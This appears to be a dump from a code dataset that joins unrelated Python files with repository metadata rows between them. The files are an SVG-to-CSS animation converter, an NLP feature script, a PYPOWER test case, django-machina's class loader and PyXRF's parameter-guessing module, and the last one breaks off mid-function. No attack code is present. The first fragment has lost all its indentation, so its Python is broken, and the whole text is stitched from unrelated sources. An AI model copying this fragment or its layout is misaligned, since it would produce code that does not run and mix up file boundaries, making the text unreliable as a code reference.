ctf = json.loads(elem.attrib['ctf'])
if len(ctf) > 1:
ctfsArray.append({key:ctf})
key_depth = LUtil.make_key_string(objId, prefix=key_prefix, suffix=depth)
structure_table[key_depth] = SvgTransform(elem.attrib)
update_elem(elem, key_depth, name, hasClipDepth)
k = objId[3:]
if (len(elem) == 0) and (k in parser_shapes):
shape_key = LUtil.make_key_string(objId, prefix=key_prefix, suffix='shape')
parent_key = get_parent_key(elem)
childdiv = etree.Element('div')
childdiv.set('class', shape_key)
structure_table[shape_key] = SvgTransform(childdiv.attrib)
svgelem = Parser.str_shape_as_svg(parser_shapes[k], ctfsArray, parent_key)
childdiv.append(svgelem)
elem.append(childdiv)
structure_tree = deepcopy(root_elem)
return structure_table, structure_tree
def _parse_xml(self, filepath):
with open(filepath, 'r') as f:
return etree.parse(f)
return None
def _remove_deplicated_keyframes(self, anim_elements):
anim_buffer = deque()
result = []
for percent, transform in anim_elements:
anim_buffer.append((percent, transform))
if len(anim_buffer) == 3:
if anim_buffer[0][1] == anim_buffer[1][1] and anim_buffer[0][1] == anim_buffer[2][1]:
anim_buffer = deque((anim_buffer[0], anim_buffer[2]))
else:
result.append(anim_buffer.popleft())
result.extend(list(anim_buffer))
return result
def _interpolate_keyframes(self, anim_elements, eps=0.0001):
result = []
old_transform = None
for i, (percent, transform) in enumerate(anim_elements):
if old_transform is not None:
if (not old_transform.visible and transform.visible):
temp_transform = deepcopy(transform)
temp_transform.visible = old_transform.visible
result.append((percent - eps, temp_transform))
elif (old_transform.visible and not transform.visible):
result.append((percent - eps, old_transform))
result.append((percent, transform))
old_transform = transform
if len(result) > 0:
result.append((100.0, result[0][1])) # 100% animation
return result
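    # Inserting an extra keyframe at (percent - eps) with the previous visibility
    # turns opacity changes into near-instant steps instead of gradual fades; the
    # first frame is repeated at 100% so the looping animation closes cleanly.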
def _make_keyframes(self, anim_table, key_prefix='', sp='\n'):
keyframes = []
for key, value in anim_table.iteritems():
anim_length = len(value)
anim_elements = [((float(i*100)/float(anim_length)), a) for i,a in enumerate(value)]
anim_list = ['%f%% { %s %s }' % (percent, a.write_webkit_transform(), a.write_visible()) for percent, a in self._interpolate_keyframes(self._remove_deplicated_keyframes(anim_elements))]
anim = sp.join(anim_list)
keyframes.append(sp.join(['@-webkit-keyframes %s {'%(key), anim, '}']))
return (sp+sp).join(keyframes)
def _make_transform(self, structure_table, shape_table, anim_table, key_prefix='', has_anim_name=True, sp='\n'):
result = []
for key, structure in structure_table.iteritems():
elem = CssElement(title='.%s'%key)
transform = ('-webkit-transform', structure.write_matrix())
if key in anim_table:
anim_length = len(anim_table[key])
elem.add_anims_element(key, anim_length, has_anim_name)
shape_key = LUtil.objectID_from_key(key)
if key.endswith('shape') and shape_key in shape_table:
elem.add_shape_element(shape_key, shape_table)
elem.add_origin_element(structure.write_matrix())
result.append(str(elem))
return (sp+sp).join(result)
def write_html(self, structure_tree, cssfilepath):
template = '''<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="ja" xml:lang="ja">
<head>
<meta http-equiv="Content-Type" content="application/xhtml+xml; charset=utf-8"></meta>
<link href="%s" type="text/css" rel="stylesheet"></link>
<title>lightning</title>
</head>
<body>
%s
</body>
</html>
'''
html = template % (cssfilepath, etree.tostring(structure_tree, pretty_print=True))
return html
def write_div(self, structure_tree):
html = "%s" % (etree.tostring(structure_tree, pretty_print=True))
return html
def write_css(self, structure_table, shape_table, anim_table, key_prefix='', has_anim_name=True, sp='\n\n'):
elem = CssElement(title='div')
css = sp.join([self._make_keyframes(anim_table, key_prefix), self._make_transform(structure_table, shape_table, anim_table, key_prefix, has_anim_name)])
return 'svg { display:block; }\n' + css
def _write(self, filepath, content):
with open(filepath, 'w') as f:
f.write(content)
| mit | -3,026,379,057,328,387,000 | 39.092697 | 197 | 0.577664 | false | 3.682405 | false | false | false |
jayantk/jklol | scripts/sequence/generate_emission_features.py | 1 | 1090 | #!/usr/local/lib/python2.6
import re
import sys
filename = sys.argv[1]
def generate_string_features(word, label):
dict = {}
'''
patterns = ['\d$', '\d\d$', '\d\d\d+$', '\d?\d?:\d\d$',
'[0-9:]+$', '[A-Z]', '[A-Z]$', '[A-Z][A-Z]$',
'[A-Z]+$', '[^0-9A-Za-z]+$', '[^0-9]+$', '[A-Za-z]+$',
'[a-z]+$']
for pattern in patterns:
if re.match(pattern, word):
dict['regex=' + pattern + '_label=' + label] = 1
'''
dict['bias_label=' + label] = 1
dict['word=' + word.lower() + '_label=' + label] = 1
return dict
words = set()
labels = set()
with open(filename, 'r') as f:
for line in f:
chunks = line.strip().split(" ")
for i in range(0, len(chunks), 2):
words.add(chunks[i].strip())
labels.add(chunks[i + 1].strip())
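# Print one line per (word, label, feature) triple, with fields separated by "@#@#@".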
for word in words:
for label in labels:
features = generate_string_features(word, label)
for feature in features.keys():
print "%s@#@#@%s@#@#@%s@#@#@%d" % (word, label, feature, features[feature])
| bsd-2-clause | 780,676,244,806,136,700 | 26.25 | 87 | 0.478899 | false | 3.01105 | false | false | false |
praba230890/PYPOWER | pypower/t/t_case_ext.py | 2 | 4105 | # Copyright (c) 1996-2015 PSERC. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
"""Case data in external format.
"""
from numpy import array, ones, arange, r_
def t_case_ext():
"""Case data in external format used to test C{ext2int} and C{int2ext}.
"""
ppc = {}
## PYPOWER Case Format : Version 2
ppc['version'] = '2'
##----- Power Flow Data -----##
## system MVA base
ppc['baseMVA'] = 100.0
## bus data
# bus_i type Pd Qd Gs Bs area Vm Va baseKV zone Vmax Vmin
ppc['bus'] = array([
[1, 3, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[2, 2, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[30, 2, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[4, 1, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[5, 1, 90, 30, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[20, 4, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[6, 1, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[7, 1, 100, 35, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[8, 1, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[9, 1, 125, 50, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9]
])
## generator data
# bus, Pg, Qg, Qmax, Qmin, Vg, mBase, status, Pmax, Pmin, Pc1, Pc2,
# Qc1min, Qc1max, Qc2min, Qc2max, ramp_agc, ramp_10, ramp_30, ramp_q, apf
ppc['gen'] = array([
[30, 85, 0, 300, -300, 1, 100, 1, 270, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[2, 163, 0, 300, -300, 1, 100, 1, 300, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[20, 20, 0, 300, -300, 1, 100, 1, 200, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 300, -300, 1, 100, 1, 250, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
], float)
## branch data
# fbus, tbus, r, x, b, rateA, rateB, rateC, ratio, angle, status, angmin, angmax
ppc['branch'] = array([
[1, 4, 0, 0.0576, 0, 0, 250, 250, 0, 0, 1, -360, 360],
[4, 5, 0.017, 0.092, 0.158, 0, 250, 250, 0, 0, 1, -360, 360],
[5, 6, 0.039, 0.17, 0.358, 150, 150, 150, 0, 0, 1, -360, 360],
[30, 6, 0, 0.0586, 0, 0, 300, 300, 0, 0, 1, -360, 360],
[6, 7, 0.0119, 0.1008, 0.209, 40, 150, 150, 0, 0, 1, -360, 360],
[7, 8, 0.0085, 0.072, 0.149, 250, 250, 250, 0, 0, 1, -360, 360],
[8, 20, 0, 0.1, 0, 250, 250, 250, 0, 0, 1, -360, 360],
[8, 2, 0, 0.0625, 0, 250, 250, 250, 0, 0, 1, -360, 360],
[8, 9, 0.032, 0.161, 0.306, 250, 250, 250, 0, 0, 1, -360, 360],
[9, 4, 0.01, 0.085, 0.176, 250, 250, 250, 0, 0, 1, -360, 360]
])
##----- OPF Data -----##
## area data
# area refbus
ppc['areas'] = array([
[2, 20],
[1, 5]
], float)
## generator cost data
# 1 startup shutdown n x1 y1 ... xn yn
# 2 startup shutdown n c(n-1) ... c0
ppc['gencost'] = array([
[2, 0, 0, 2, 15, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 4, 0, 0, 100, 2500, 200, 5500, 250, 7250],
[2, 0, 0, 2, 20, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 4, 0, 0, 100, 2000, 200, 4403.5, 270, 6363.5]
])
ppc['A'] = array([
[1, 2, 3, 4, 5, 0, 7, 8, 9, 10, 11, 12, 13, 14, 15, 0, 17, 18, 19, 20, 21, 22, 0, 24, 25, 26, 0, 28, 29, 30],
[2, 4, 6, 8, 10, 0, 14, 16, 18, 20, 22, 24, 26, 28, 30, 0, 34, 36, 38, 40, 42, 44, 0, 48, 50, 52, 0, 56, 58, 60]
], float)
ppc['N'] = array([
[30, 29, 28, 27, 26, 25, 24, 23, 22, 21, 20, 19, 18, 17, 16, 15, 14, 13, 12, 11, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1],
[60, 58, 56, 54, 52, 50, 48, 46, 44, 42, 40, 38, 36, 34, 32, 30, 28, 26, 24, 22, 20, 18, 16, 14, 12, 10, 8, 6, 4, 2],
], float)
ppc['xbus'] = arange(100, dtype=float).reshape((10, 10))
ppc['xgen'] = arange(16, dtype=float).reshape((4, 4))
ppc['xbranch'] = ppc['xbus'].copy()
ppc['xrows'] = r_[ppc['xbranch'][:, :4], ppc['xgen'], ppc['xbus'][:, :4], -ones((2, 4))]
ppc['xcols'] = ppc['xrows'].T
ppc['x'] = { 'more': ppc['xgen'] }
return ppc
| bsd-3-clause | -4,254,840,702,159,437,000 | 40.887755 | 125 | 0.436541 | false | 2.18119 | false | false | false |
ellmetha/django-machina | machina/core/loading.py | 1 | 3900 | import sys
import traceback
from django.conf import settings
class AppNotFoundError(Exception):
pass
class ClassNotFoundError(Exception):
pass
def get_class(module_label, classname):
return get_classes(module_label, [classname, ])[0]
def get_classes(module_label, classnames):
""" Imports a set of classes from a given module.
Usage::
get_classes('forum.models', ['Forum', 'ForumReadTrack', ])
"""
app_label = module_label.split('.')[0]
app_module_path = _get_app_module_path(module_label)
if not app_module_path:
raise AppNotFoundError('No app found matching \'{}\''.format(module_label))
# Determines the full module path by appending the module label
# to the base package path of the considered application.
module_path = app_module_path
if '.' in app_module_path:
base_package = app_module_path.rsplit('.' + app_label, 1)[0]
module_path = '{}.{}'.format(base_package, module_label)
# Try to import this module from the related app that is specified
# in the Django settings.
local_imported_module = _import_module(module_path, classnames)
# If the module we tried to import is not located inside the machina
# vanilla apps, try to import it from the corresponding machina app.
machina_imported_module = None
if not app_module_path.startswith('machina.apps'):
machina_imported_module = _import_module(
'{}.{}'.format('machina.apps', module_label), classnames,
)
if local_imported_module is None and machina_imported_module is None:
raise AppNotFoundError('Error importing \'{}\''.format(module_path))
# Any local module is prioritized over the corresponding machina module
imported_modules = [
m for m in (local_imported_module, machina_imported_module) if m is not None
]
return _pick_up_classes(imported_modules, classnames)
def _import_module(module_path, classnames):
""" Tries to import the given Python module path. """
try:
imported_module = __import__(module_path, fromlist=classnames)
return imported_module
except ImportError:
# In case of an ImportError, the module being loaded generally does not exist. But an
# ImportError can occur if the module being loaded exists and another import located inside
# it failed.
#
# In order to provide a meaningfull traceback, the execution information can be inspected in
# order to determine which case to consider. If the execution information provides more than
# a certain amount of frames, this means that an ImportError occured while loading the
# initial Python module.
__, __, exc_traceback = sys.exc_info()
frames = traceback.extract_tb(exc_traceback)
if len(frames) > 1:
raise
def _pick_up_classes(modules, classnames):
""" Given a list of class names to retrieve, try to fetch them from the specified list of
modules and returns the list of the fetched classes.
"""
klasses = []
for classname in classnames:
klass = None
for module in modules:
if hasattr(module, classname):
klass = getattr(module, classname)
break
if not klass:
raise ClassNotFoundError('Error fetching \'{}\' in {}'.format(
classname, str([module.__name__ for module in modules]))
)
klasses.append(klass)
return klasses
def _get_app_module_path(module_label):
""" Given a module label, loop over the apps specified in the INSTALLED_APPS to find the
corresponding application module path.
"""
app_name = module_label.rsplit('.', 1)[0]
for app in settings.INSTALLED_APPS:
if app.endswith('.' + app_name) or app == app_name:
return app
return None
| bsd-3-clause | 3,359,601,575,584,082,400 | 34.779817 | 100 | 0.65641 | false | 4.257642 | false | false | false |
ericdill/PyXRF | pyxrf/model/guessparam.py | 1 | 27631 | # ######################################################################
# Copyright (c) 2014, Brookhaven Science Associates, Brookhaven #
# National Laboratory. All rights reserved. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions #
# are met: #
# #
# * Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# #
# * Redistributions in binary form must reproduce the above copyright #
# notice this list of conditions and the following disclaimer in #
# the documentation and/or other materials provided with the #
# distribution. #
# #
# * Neither the name of the Brookhaven Science Associates, Brookhaven #
# National Laboratory nor the names of its contributors may be used #
# to endorse or promote products derived from this software without #
# specific prior written permission. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS #
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS #
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE #
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, #
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES #
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR #
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) #
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, #
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OTHERWISE) ARISING #
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #
# POSSIBILITY OF SUCH DAMAGE. #
########################################################################
__author__ = 'Li Li'
import numpy as np
import six
import json
from collections import OrderedDict
import copy
import os
from atom.api import (Atom, Str, observe, Typed,
Int, Dict, List, Float, Enum, Bool)
from skxray.fitting.background import snip_method
from skxray.constants.api import XrfElement as Element
from skxray.fitting.xrf_model import (ModelSpectrum, ParamController,
trim, construct_linear_model, linear_spectrum_fitting)
#from pyxrf.model.fit_spectrum import fit_strategy_list
import logging
logger = logging.getLogger(__name__)
bound_options = ['none', 'lohi', 'fixed', 'lo', 'hi']
fit_strategy_list = ['fit_with_tail', 'free_more',
'e_calibration', 'linear',
'adjust_element1', 'adjust_element2', 'adjust_element3']
class Parameter(Atom):
# todo make sure that these are the only valid bound types
bound_type = Enum(*bound_options)
min = Float(-np.inf)
max = Float(np.inf)
value = Float()
default_value = Float()
fit_with_tail = Enum(*bound_options)
free_more = Enum(*bound_options)
adjust_element1 = Enum(*bound_options)
adjust_element2 = Enum(*bound_options)
adjust_element3 = Enum(*bound_options)
e_calibration = Enum(*bound_options)
linear = Enum(*bound_options)
name = Str()
description = Str()
tool_tip = Str()
@observe('name', 'bound_type', 'min', 'max', 'value', 'default_value')
def update_displayed_name(self, changed):
pass
# print(changed)
def __repr__(self):
return ("Parameter(bound_type={}, min={}, max={}, value={}, "
"default={}, free_more={}, adjust_element1={}, "
"adjust_element2={}, adjust_element3={}, "
"e_calibration={}, linear={}, description={}, "
"toop_tip={}".format(
self.bound_type, self.min, self.max, self.value, self.default_value,
self.free_more, self.adjust_element1, self.adjust_element2,
self.adjust_element3, self.e_calibration,
self.linear, self.description, self.tool_tip))
def to_dict(self):
return {
'bound_type': self.bound_type,
'min': self.min,
'max': self.max,
'value': self.value,
'default_value': self.default_value,
'fit_with_tail': self.fit_with_tail,
'free_more': self.free_more,
'adjust_element1': self.adjust_element1,
'adjust_element2': self.adjust_element2,
'adjust_element3': self.adjust_element3,
'e_calibration': self.e_calibration,
'linear': self.linear,
'name': self.name,
'description': self.description,
'tool_tip': self.tool_tip,
}
def format_dict(parameter_object_dict, element_list):
"""
Format the dictionary that scikit-xray expects.
Parameters
----------
parameter_object_dict : dict
element_list : list
        Joined into a comma-separated string before being stored in the dict.
"""
param_dict = {key: value.to_dict() for key, value
in six.iteritems(parameter_object_dict)}
elo = param_dict.pop('energy_bound_low')['value']
ehi = param_dict.pop('energy_bound_high')['value']
non_fitting_values = {'non_fitting_values': {
'energy_bound_low': elo,
'energy_bound_high': ehi,
'element_list': ', '.join(element_list)
}}
param_dict.update(non_fitting_values)
return param_dict
def dict_to_param(param_dict):
"""
Transfer param dict to parameter object.
    Parameters
    ----------
    param_dict : dict
        fitting parameter
"""
temp_parameters = copy.deepcopy(param_dict)
non_fitting_values = temp_parameters.pop('non_fitting_values')
element_list = non_fitting_values.pop('element_list')
if not isinstance(element_list, list):
element_list = [e.strip(' ') for e in element_list.split(',')]
#self.element_list = element_list
elo = non_fitting_values.pop('energy_bound_low')
ehi = non_fitting_values.pop('energy_bound_high')
param = {
'energy_bound_low': Parameter(value=elo,
default_value=elo,
description='E low limit [keV]'),
'energy_bound_high': Parameter(value=ehi,
default_value=ehi,
description='E high limit [keV]')
}
for param_name, param_dict in six.iteritems(temp_parameters):
if 'default_value' in param_dict:
param.update({param_name: Parameter(**param_dict)})
else:
param.update({
param_name: Parameter(default_value=param_dict['value'],
**param_dict)
})
return element_list, param
class PreFitStatus(Atom):
"""
Data structure for pre fit analysis.
Attributes
----------
z : str
z number of element
spectrum : array
spectrum of given element
status : bool
True as plot is visible
stat_copy : bool
copy of status
maxv : float
max value of a spectrum
norm : float
norm value respect to the strongest peak
lbd_stat : bool
define plotting status under a threshold value
"""
z = Str()
energy = Str()
spectrum = Typed(np.ndarray)
status = Bool(False)
stat_copy = Bool(False)
maxv = Float()
norm = Float()
lbd_stat = Bool(False)
class ElementController(object):
"""
This class performs basic ways to rank elements, show elements,
calculate normed intensity, and etc.
"""
def __init__(self):
self.element_dict = OrderedDict()
def delete_item(self, k):
try:
del self.element_dict[k]
self.update_norm()
logger.info('Item {} is deleted.'.format(k))
        except KeyError as e:
logger.info(e)
def order(self, option='z'):
"""
Order dict in different ways.
"""
if option == 'z':
self.element_dict = OrderedDict(sorted(six.iteritems(self.element_dict),
key=lambda t: t[1].z))
elif option == 'energy':
self.element_dict = OrderedDict(sorted(six.iteritems(self.element_dict),
key=lambda t: t[1].energy))
elif option == 'name':
self.element_dict = OrderedDict(sorted(six.iteritems(self.element_dict),
key=lambda t: t[0]))
elif option == 'maxv':
self.element_dict = OrderedDict(sorted(six.iteritems(self.element_dict),
key=lambda t: t[1].maxv, reverse=True))
def add_to_dict(self, dictv):
self.element_dict.update(dictv)
self.update_norm()
def update_norm(self, threshv=0.1):
"""
Calculate the norm intensity for each element peak.
Parameters
----------
threshv : float
            No value is shown when smaller than the threshold value
"""
#max_dict = reduce(max, map(np.max, six.itervalues(self.element_dict)))
max_dict = np.max(np.array([v.maxv for v in six.itervalues(self.element_dict)]))
for v in six.itervalues(self.element_dict):
v.norm = v.maxv/max_dict*100
v.lbd_stat = bool(v.norm > threshv)
def delete_all(self):
self.element_dict.clear()
def get_element_list(self):
current_elements = [v for v in six.iterkeys(self.element_dict) if v.lower() != v]
logger.info('Current Elements for fitting are {}'.format(current_elements))
return current_elements
def update_peak_ratio(self):
"""
In case users change the max value.
"""
for v in six.itervalues(self.element_dict):
v.maxv = np.around(v.maxv, 1)
v.spectrum = v.spectrum*v.maxv/np.max(v.spectrum)
self.update_norm()
def turn_on_all(self, option=True):
"""
Set plotting status on for all lines.
"""
if option:
_plot = option
else:
_plot = False
for v in six.itervalues(self.element_dict):
v.status = _plot
class GuessParamModel(Atom):
"""
This is auto fit model to guess the initial parameters.
Attributes
----------
parameters : `atom.Dict`
A list of `Parameter` objects, subclassed from the `Atom` base class.
These `Parameter` objects hold all relevant xrf information.
data : array
1D array of spectrum
prefit_x : array
        X axis with range defined by low and high limits.
result_dict : dict
Save all the auto fitting results for each element.
It is a dictionary of object PreFitStatus.
param_d : dict
Parameters can be transferred into this dictionary.
param_new : dict
        More information is saved, such as element position and width.
    total_y : dict
        Results from K lines
    total_y_l : dict
        Results from L lines
    total_y_m : dict
        Results from M lines
e_list : str
All elements used for fitting.
file_path : str
The path where file is saved.
element_list : list
"""
default_parameters = Dict()
#parameters = Dict() #Typed(OrderedDict) #OrderedDict()
data = Typed(object)
prefit_x = Typed(object)
result_dict = Typed(object) #Typed(OrderedDict)
result_dict_names = List()
#param_d = Dict()
param_new = Dict()
total_y = Dict()
total_y_l = Dict()
total_y_m = Dict()
e_name = Str()
add_element_intensity = Float()
#save_file = Str()
result_folder = Str()
#file_path = Str()
element_list = List()
data_sets = Typed(OrderedDict)
file_opt = Int()
data_all = Typed(np.ndarray)
EC = Typed(object)
def __init__(self, *args, **kwargs):
try:
self.default_parameters = kwargs['default_parameters']
#self.element_list, self.parameters = dict_to_param(self.default_parameters)
self.param_new = copy.deepcopy(self.default_parameters)
self.element_list = get_element(self.param_new)
#self.get_param(default_parameters)
except ValueError:
logger.info('No default parameter files are chosen.')
self.result_folder = kwargs['working_directory']
self.EC = ElementController()
def get_new_param(self, param_path):
"""
Update parameters if new param_path is given.
Parameters
----------
param_path : str
path to save the file
"""
with open(param_path, 'r') as json_data:
self.param_new = json.load(json_data)
#self.element_list, self.parameters = dict_to_param(self.param_new)
self.element_list = get_element(self.param_new)
self.EC.delete_all()
self.create_spectrum_from_file(self.param_new, self.element_list)
logger.info('Elements read from file are: {}'.format(self.element_list))
#self.element_list, self.parameters = self.get_param(new_param)
def create_spectrum_from_file(self, param_dict, elemental_lines):
"""
Create spectrum profile with given param dict from file.
Parameters
----------
param_dict : dict
dict obtained from file
elemental_lines : list
e.g., ['Na_K', Mg_K', 'Pt_M'] refers to the
K lines of Sodium, the K lines of Magnesium, and the M
lines of Platinum
"""
self.prefit_x, pre_dict = calculate_profile(self.data,
param_dict, elemental_lines)
#factor_to_area = factor_height2area()
temp_dict = OrderedDict()
for e in six.iterkeys(pre_dict):
ename = e.split('_')[0]
for k, v in six.iteritems(param_dict):
if ename in k and 'area' in k:
energy = float(get_energy(e))
factor_to_area = factor_height2area(energy, self.param_new)
ratio = v['value']/factor_to_area
spectrum = pre_dict[e] #/ np.max(pre_dict[e]) * ratio
elif ename == 'compton' and k == 'compton_amplitude':
# the rest-mass energy of an electron (511 keV)
mc2 = 511
comp_denom = (1 + self.param_new['coherent_sct_energy']['value']
/ mc2 * (1 - np.cos(np.deg2rad(self.param_new['compton_angle']['value']))))
compton_energy = self.param_new['coherent_sct_energy']['value'] / comp_denom
factor_to_area = factor_height2area(compton_energy, self.param_new,
std_correction=self.param_new['compton_fwhm_corr']['value'])
spectrum = pre_dict[e] #/ np.max(pre_dict[e]) * ratio
elif ename == 'elastic' and k == 'coherent_sct_amplitude':
factor_to_area = factor_height2area(self.param_new['coherent_sct_energy']['value'],
self.param_new)
ratio = v['value']/factor_to_area
spectrum = pre_dict[e] #/ np.max(pre_dict[e]) * ratio
elif ename == 'background':
spectrum = pre_dict[e]
else:
continue
ps = PreFitStatus(z=get_Z(ename), energy=get_energy(e), spectrum=spectrum,
maxv=np.around(np.max(spectrum), 1),
norm=-1, lbd_stat=False)
temp_dict.update({e: ps})
self.EC.add_to_dict(temp_dict)
@observe('file_opt')
def choose_file(self, change):
if self.file_opt == 0:
return
names = self.data_sets.keys()
self.data = self.data_sets[names[self.file_opt-1]].get_sum()
self.data_all = self.data_sets[names[self.file_opt-1]].raw_data
def manual_input(self):
default_area = 1e5
logger.info('Element {} is added'.format(self.e_name))
#param_dict = format_dict(self.parameters, self.element_list)
x, data_out = calculate_profile(self.data, self.param_new,
elemental_lines=[self.e_name], default_area=default_area)
ps = PreFitStatus(z=get_Z(self.e_name), energy=get_energy(self.e_name),
spectrum=data_out[self.e_name]/np.max(data_out[self.e_name])*self.add_element_intensity,
maxv=self.add_element_intensity, norm=-1,
lbd_stat=False)
self.EC.add_to_dict({self.e_name: ps})
def update_name_list(self):
"""
When result_dict_names change, the looper in enaml will update.
"""
# need to clean list first, in order to refresh the list in GUI
self.result_dict_names = []
self.result_dict_names = self.EC.element_dict.keys()
logger.info('Current element names are {}'.format(self.result_dict_names))
def find_peak(self, threshv=0.1):
"""
Run automatic peak finding, and save results as dict of object.
"""
#param_dict = format_dict(self.parameters, self.element_list)
self.prefit_x, out_dict = linear_spectrum_fitting(self.data,
self.param_new)
logger.info('Energy range: {}, {}'.format(self.param_new['non_fitting_values']['energy_bound_low']['value'],
self.param_new['non_fitting_values']['energy_bound_high']['value']))
#max_dict = reduce(max, map(np.max, six.itervalues(out_dict)))
prefit_dict = OrderedDict()
for k, v in six.iteritems(out_dict):
ps = PreFitStatus(z=get_Z(k), energy=get_energy(k), spectrum=v,
maxv=np.around(np.max(v), 1), norm=-1,
lbd_stat=False)
prefit_dict.update({k: ps})
logger.info('The elements from parameter guess: {}'.format(
prefit_dict.keys()))
self.EC.add_to_dict(prefit_dict)
def create_full_param(self, peak_std=0.07):
"""
Extend the param to full param dict with detailed elements
information, and assign initial values from pre fit.
Parameters
----------
peak_std : float
approximated std for element peak.
"""
self.element_list = self.EC.get_element_list()
self.param_new['non_fitting_values']['element_list'] = ', '.join(self.element_list)
#param_d = format_dict(self.parameters, self.element_list)
self.param_new = param_dict_cleaner(self.param_new, self.element_list)
print('element list before register: {}'.format(self.element_list))
# create full parameter list including elements
PC = ParamController(self.param_new, self.element_list)
#PC.create_full_param()
self.param_new = PC.params
# to create full param dict, for GUI only
create_full_dict(self.param_new, fit_strategy_list)
logger.info('full dict: {}'.format(self.param_new.keys()))
logger.info('incident energy: {}'.format(self.param_new['coherent_sct_energy']['value']))
# update according to pre fit results
if len(self.EC.element_dict):
for e in self.element_list:
zname = e.split('_')[0]
for k, v in six.iteritems(self.param_new):
if zname in k and 'area' in k:
factor_to_area = factor_height2area(float(self.EC.element_dict[e].energy),
self.param_new)
v['value'] = self.EC.element_dict[e].maxv * factor_to_area
if 'compton' in self.EC.element_dict:
gauss_factor = 1/(1 + self.param_new['compton_f_step']['value']
+ self.param_new['compton_f_tail']['value']
+ self.param_new['compton_hi_f_tail']['value'])
# the rest-mass energy of an electron (511 keV)
mc2 = 511
comp_denom = (1 + self.param_new['coherent_sct_energy']['value']
/ mc2 * (1 - np.cos(np.deg2rad(self.param_new['compton_angle']['value']))))
compton_energy = self.param_new['coherent_sct_energy']['value'] / comp_denom
factor_to_area = factor_height2area(compton_energy, self.param_new,
std_correction=self.param_new['compton_fwhm_corr']['value'])
self.param_new['compton_amplitude']['value'] = \
self.EC.element_dict['compton'].maxv * factor_to_area
if 'coherent_sct_amplitude' in self.EC.element_dict:
self.param_new['coherent_sct_amplitude']['value'] = np.sum(
self.EC.element_dict['elastic'].spectrum)
def data_for_plot(self):
"""
Save data in terms of K, L, M lines for plot.
"""
self.total_y = {}
self.total_y_l = {}
self.total_y_m = {}
new_dict = {k: v for (k, v) in six.iteritems(self.EC.element_dict) if v.status}
for k, v in six.iteritems(new_dict):
if 'K' in k:
self.total_y[k] = self.EC.element_dict[k].spectrum
elif 'L' in k:
self.total_y_l[k] = self.EC.element_dict[k].spectrum
elif 'M' in k:
self.total_y_m[k] = self.EC.element_dict[k].spectrum
else:
self.total_y[k] = self.EC.element_dict[k].spectrum
def save(self, fname='param_default1.json'):
"""
Save full param dict into a file at result directory.
The name of the file is predefined.
Parameters
----------
fname : str, optional
file name to save updated parameters
"""
fpath = os.path.join(self.result_folder, fname)
with open(fpath, 'w') as outfile:
json.dump(self.param_new, outfile,
sort_keys=True, indent=4)
def read_pre_saved(self, fname='param_default1.json'):
"""This is a bad idea."""
fpath = os.path.join(self.result_folder, fname)
with open(fpath, 'r') as infile:
data = json.load(infile)
return data
def save_as(file_path, data):
"""
Save full param dict into a file.
"""
with open(file_path, 'w') as outfile:
json.dump(data, outfile,
sort_keys=True, indent=4)
def calculate_profile(y0, param,
elemental_lines, default_area=1e5):
# Need to use deepcopy here to avoid unexpected change on parameter dict
fitting_parameters = copy.deepcopy(param)
x0 = np.arange(len(y0))
# ratio to transfer energy value back to channel value
approx_ratio = 100
lowv = fitting_parameters['non_fitting_values']['energy_bound_low']['value'] * approx_ratio
highv = fitting_parameters['non_fitting_values']['energy_bound_high']['value'] * approx_ratio
x, y = trim(x0, y0, lowv, highv)
e_select, matv = construct_linear_model(x, fitting_parameters,
elemental_lines,
default_area=default_area)
non_element = ['compton', 'elastic']
total_list = e_select + non_element
total_list = [str(v) for v in total_list]
temp_d = {k: v for (k, v) in zip(total_list, matv.transpose())}
# get background
bg = snip_method(y, fitting_parameters['e_offset']['value'],
fitting_parameters['e_linear']['value'],
fitting_parameters['e_quadratic']['value'])
temp_d.update(background=bg)
#for i in len(total_list):
# temp_d[total_list[i]] = matv[:, i]
x = (fitting_parameters['e_offset']['value']
+ fitting_parameters['e_linear']['value'] * x
+ fitting_parameters['e_quadratic']['value'] * x**2)
return x, temp_d
def create_full_dict(param, name_list):
"""
Create full param dict so each item has same nested dict.
This is for GUI purpose only.
